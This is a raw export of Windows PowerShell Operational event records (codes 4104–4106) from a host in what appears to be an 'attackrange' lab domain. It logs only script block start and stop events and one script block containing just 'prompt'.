RecordNumber=1479149
Keywords=None
Message=Started invocation of ScriptBlock ID: 519ecd82-864b-41a0-863d-86133c57dc32
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479148
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5f0aa85c-5444-43fd-b1da-6b64186a56aa
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479147
Keywords=None
Message=Started invocation of ScriptBlock ID: 5f0aa85c-5444-43fd-b1da-6b64186a56aa
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479146
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1c3140b5-b0bc-4162-ac9c-2c839624634d
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479145
Keywords=None
Message=Started invocation of ScriptBlock ID: 1c3140b5-b0bc-4162-ac9c-2c839624634d
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479144
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8e6039b9-896a-403c-bb0a-2d52cb138ef9
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479143
Keywords=None
Message=Started invocation of ScriptBlock ID: 8e6039b9-896a-403c-bb0a-2d52cb138ef9
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479142
Keywords=None
Message=Completed invocation of ScriptBlock ID: a10a92bb-5d61-4568-9c75-99105ea798c8
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479141
Keywords=None
Message=Started invocation of ScriptBlock ID: a10a92bb-5d61-4568-9c75-99105ea798c8
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479140
Keywords=None
Message=Completed invocation of ScriptBlock ID: 082adbe9-8267-4ada-8466-3159b7ac894d
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479139
Keywords=None
Message=Started invocation of ScriptBlock ID: 082adbe9-8267-4ada-8466-3159b7ac894d
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479138
Keywords=None
Message=Completed invocation of ScriptBlock ID: cb2e5456-88bd-490b-975d-0b656bd1e08f
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479137
Keywords=None
Message=Started invocation of ScriptBlock ID: cb2e5456-88bd-490b-975d-0b656bd1e08f
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479136
Keywords=None
Message=Completed invocation of ScriptBlock ID: 435e802e-103a-42e9-bcbf-7681335c9c93
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479135
Keywords=None
Message=Started invocation of ScriptBlock ID: 435e802e-103a-42e9-bcbf-7681335c9c93
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479134
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1f25960f-d9a3-47e1-a4bb-7d58a6de3b58
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479133
Keywords=None
Message=Started invocation of ScriptBlock ID: 1f25960f-d9a3-47e1-a4bb-7d58a6de3b58
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479132
Keywords=None
Message=Completed invocation of ScriptBlock ID: 92de335d-b7a8-4e22-8f62-5d8735034d62
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479131
Keywords=None
Message=Started invocation of ScriptBlock ID: 92de335d-b7a8-4e22-8f62-5d8735034d62
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479130
Keywords=None
Message=Completed invocation of ScriptBlock ID: ae23a96a-0110-4acd-95cb-f310c67674b0
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479129
Keywords=None
Message=Started invocation of ScriptBlock ID: ae23a96a-0110-4acd-95cb-f310c67674b0
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479128
Keywords=None
Message=Completed invocation of ScriptBlock ID: c899e428-f711-4024-9e22-aa64f80e78b3
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479127
Keywords=None
Message=Started invocation of ScriptBlock ID: c899e428-f711-4024-9e22-aa64f80e78b3
Runspace ID: 07e8bf18-16b7-4244-ae11-0afbe281a2ed
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479306
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479305
Keywords=None
Message=Completed invocation of ScriptBlock ID: 78274e84-0db5-4ef0-9cfd-29e918023301
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479304
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479303
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479302
Keywords=None
Message=Started invocation of ScriptBlock ID: 78274e84-0db5-4ef0-9cfd-29e918023301
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479301
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 78274e84-0db5-4ef0-9cfd-29e918023301
Path:
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479300
Keywords=None
Message=Completed invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479299
Keywords=None
Message=Started invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479298
Keywords=None
Message=Completed invocation of ScriptBlock ID: f7a7b70f-f231-4997-8908-762a0f635440
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479297
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479296
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479295
Keywords=None
Message=Completed invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479294
Keywords=None
Message=Started invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479293
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479292
Keywords=None
Message=Started invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479291
Keywords=None
Message=Completed invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479290
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479289
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479288
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479287
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479286
Keywords=None
Message=Started invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479285
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479284
Keywords=None
Message=Completed invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479283
Keywords=None
Message=Started invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479282
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479281
Keywords=None
Message=Completed invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479280
Keywords=None
Message=Started invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479279
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479278
Keywords=None
Message=Started invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479277
Keywords=None
Message=Completed invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479276
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479275
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479274
Keywords=None
